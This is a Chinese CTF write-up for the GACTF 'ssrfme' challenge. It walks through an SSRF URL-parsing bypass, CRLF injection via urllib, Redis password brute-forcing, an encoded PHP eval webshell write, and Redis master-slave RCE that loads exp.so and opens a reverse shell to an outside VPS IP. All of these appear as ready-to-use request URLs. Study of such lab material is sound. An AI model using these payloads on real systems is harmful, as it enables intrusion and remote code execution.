GACTF之ssrfme

點擊藍字 ·  關注咱們

01

繞過url解析

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/&rid=2&pid=1&title=

02

爆破內部端口

03

存在注入

發現第二個web是urllib 對應版本存在CRLF注入

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:999

03

爆破

爆破發現存在redis端口 6379，可是密碼怎麼都不對，結合題目說的提示推測多是安全機制。

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Ainfo%250D%250A1

服務器搭建測試 直接提交 有安全機制

可是若是發送

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520evil%250D%250A

服務器無回顯 可是A已經被設置爲evil了 因此就不用管 先搞密碼

爆破redis密碼我是用的主歷來作的，當密碼正確會鏈接到個人vps

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aslaveof%2520123.56.22.0%25202323%250D%250A1

redis密碼123456

04

shell 失敗嘗試主從rce

寫shell失敗 多是無權限 就不考慮計劃任務了

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520%2520%253C%253Fphp%253b%2540eval%2528%2524_POST%255Bc%255D%2529%253B%253F%253E%250A%250D%250A%250D%250A%250d%250aconfig%2520set%2520dir%2520/tmp%250d%250aconfig%2520set%2520dbfilename%2520suanve.php%250d%250asave%250d%250apadding

嘗試主從rce

參考https://blog.csdn.net/weixin_43610673/article/details/106457180

使用工具

https://github.com/xmsec/redis-ssrf

執行腳本不停的監聽

while [ "1" = "1" ]do python rogue-server.pydone

05

三次請求&反彈拿flag

準備好之後nc監聽6663端口 依次發送三次請求

  

0x01 設置tmp目錄

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dir%2520%252ftmp%250d%250a1

0x02 設置exp.so

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520123.56.22.0%25206666%250d%250aquit%250a1

0x03 加載so後執行反彈命令

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250amodule%2520load%2520%252ftmp%252fexp.so%250d%250asystem.rev%2520123.56.22.0%25206663%250d%250aquit%250d%250a1

服務器收到三次請求

反彈拿到shell

GACTF{to0_t0o_easy_SSRF101_1ace2020}

EDI安全

掃二維碼｜關注咱們

一個專一滲透實戰經驗分享的公衆號

本文分享自微信公衆號 - WhITECat安全團隊（WhITECat_007）。
若有侵權，請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」，歡迎正在閱讀的你也加入，一塊兒分享。